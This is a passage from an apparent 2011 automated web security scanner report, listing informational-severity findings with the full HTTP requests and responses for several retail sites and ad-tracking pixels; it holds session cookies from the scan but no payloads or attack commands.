Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPo0cFA00001idcDaMPm0cEt00001iEDtaMQF06b+00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001iN4OaMPo0d9d00000; B3=9xx40000000001uD8Yi+0000000001uD98IM0000000000uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD8VSD0000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:54:08 GMT
Connection: close
Content-Length: 267

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://segment-pixel.invitemedia.com/pixel?pixelID=2083&partnerID=31&clientID=1027&key=segment';
ebReportingImg1 = new Image();
ebReportingImg1.sr
...[SNIP]...

25.2. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1174584;type=fy10p031;cat=petsm990;ord=9762737283017.486? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:13 GMT
Expires: Mon, 16 May 2011 01:53:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

25.3. http://media.gnc.com/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /ipixel

Request

GET /ipixel?spacedesc=1087272_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=GNC&event=Homepage&random=1305510847078&te_siteid=76&te_pagetype=home&REVENUE=&USERID=125602265854&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gnc.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com
Content-Type: text/html
Content-Length: 31
Connection: close

<HTML><BODY>


</BODY></HTML>

25.4. http://media.gsimedia.net/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /ipixel

Request

GET /ipixel?spacedesc=1087320_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=ACE&event=Homepage&random=1305510836880&te_siteid=133&te_pagetype=home&REVENUE=&USERID=125602208394&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gsimedia.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=22-662078189

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net
Content-Type: text/html
Content-Length: 30
Connection: close

<HTML><BODY>


</BODY></HTML>

25.5. https://ordering.ftd.com/empty/index.epl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /empty/index.epl

Request

GET /empty/index.epl HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:37 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Cache-Control: max-age=86400
Connection: close
Content-Type: text/html
Content-Length: 154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>Empty Page</title></head>
<body>
<!-- empty page -->

</body>
</html>

25.6. https://ordering.ftd.com/new-signup/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

25.7. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

25.8. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

25.9. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Request

GET /meta?_o=16993&_t=cm HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-1970 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/
Set-cookie: O16993=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: C1315892=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Content-type: text/html
Content-length: 20992
Connection: close

_cm_registerCallback(1105, function (data) {

//v3.7.18

var xptid = "";
var xpsid = "";
var xpcost = "";
var xpcg = "";
var xpordernum = "";
var xprand = 0; //tes
...[SNIP]...

25.10. https://secure.bhphotovideo.com/tryagainlater.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /tryagainlater.html

Request

GET /tryagainlater.html HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937; TS20403f=8a761c2c8821a78158429f233f763ae4122d42923efb3af94dd0f9c1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Last-Modified: Fri, 15 Sep 2006 03:25:36 GMT
ETag: "50-450a1d30"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:41 GMT
Connection: keep-alive
Content-Length: 160

<html>
<head><script src="/FrameWork/js/tsedge_instr-min.js" type="text/javascript"></script><title>Sorry</title></head>
<body>
Try again later.
</body>
</html>

25.11. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /uiframework/skins/default/js/shoppingCart.js

Request

GET /uiframework/skins/default/js/shoppingCart.js HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: https://secure.orientaltrading.com/ui/userProfile/processRequest.do?requestURI=displayLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; JSESSIONID=sz7tNQ5LLchTqrzz9nrtfknpW1ThvbLMlF1vJ5vfMB2Wpdk8p0s4!-2120161015; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305541001747}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:54 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 10650
Last-Modified: Fri, 06 May 2011 14:08:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html

var errorCounter = 0;
var gcErrorMsg = false;
var nextElement;

function getProductDetails(requestURI, productId, sku)
{
document[lookupIdByTagId("frmCategoryLevels")][lookupIdByTagId("reque
...[SNIP]...

25.12. https://www.armaniexchange.com/pageloading.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /pageloading.html

Request

GET /pageloading.html HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: https://www.armaniexchange.com/account/login.do?method=view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305511392054}

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:36 GMT
ETag: "42-a04cb700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:03:35 GMT
Date: Mon, 16 May 2011 02:03:35 GMT
Connection: keep-alive
Content-Length: 66

<html>
<head>
</head>
<body>
Page Loading...
</body>
</html>

25.13. http://www.bhphotovideo.com/tryagainlater.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /tryagainlater.html

Request

GET /tryagainlater.html HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541030076&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=1305541030075&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Last-Modified: Fri, 15 Sep 2006 03:25:36 GMT
ETag: "50-450a1d30"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:11 GMT
Connection: close
Content-Length: 80

<html>
<head><title>Sorry</title></head>
<body>
Try again later.
</body>
</html>

25.14. http://www.bluenile.com/images2/spix.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /images2/spix.gif

Request

GET /images2/spix.gif HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3888000
Date: Mon, 16 May 2011 10:23:35 GMT
Content-Type: text/html
Content-Location: http://www.bluenile.com/404-redirect.html?404;http://www.bluenile.com:80/images2/spix.gif
Last-Modified: Tue, 21 Oct 2008 17:06:04 GMT
Accept-Ranges: bytes
ETag: "026ea4c9f33c91:78e6"
Vary: Accept-Encoding
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Content-Length: 178

<HTML>
<HEAD>
<!-- Send users to the new location. -->
<TITLE>redirect</TITLE>
<META HTTP-EQUIV="refresh"
CONTENT="0;URL=http://www.bluenile.com/404.jsp">
</HEAD>
</HTML>

25.15. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
